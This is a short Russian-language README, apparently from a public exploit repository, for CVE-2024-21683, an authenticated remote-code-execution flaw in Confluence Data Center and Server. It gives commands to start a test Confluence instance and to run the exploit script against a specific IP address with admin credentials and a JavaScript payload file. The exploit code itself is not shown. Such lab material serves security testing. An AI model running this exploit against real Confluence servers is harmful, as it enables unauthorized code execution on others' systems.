Share
## https://sploitus.com/exploit?id=2B30C104-0A3F-5F97-9345-0BD4F5428371
# CVE-2024-21683
>21 мая 2024 года была зарегистрирована уязвимость в Confluence Data Center and Server, получившая номер CVE-2024-21683, а также высокий балл 8.3 по метрике CVSS.

Данная уязвимость позволяет авторизованному пользователю с наличием глобального права доступа System Administrator осуществить выполнение произвольного кода.

## Запуск проекта

``` 
# Переход в директорию для запуска сервиса
cd confluence

# Копирование переменных окружения
cp .env.example .env 

# Запуск проекта
make run

# Переход в корень рабочей директории
cd ..
```

## Запуск эксплойта
``` 
# Загрузка зависимостей
poetry install

# Запуск экслойта
poetry run python3 CVE-2024-21683.py -t http://84.201.163.5:8090 -u admin -p HardP@ssw0rd\! -f ./exp.js
```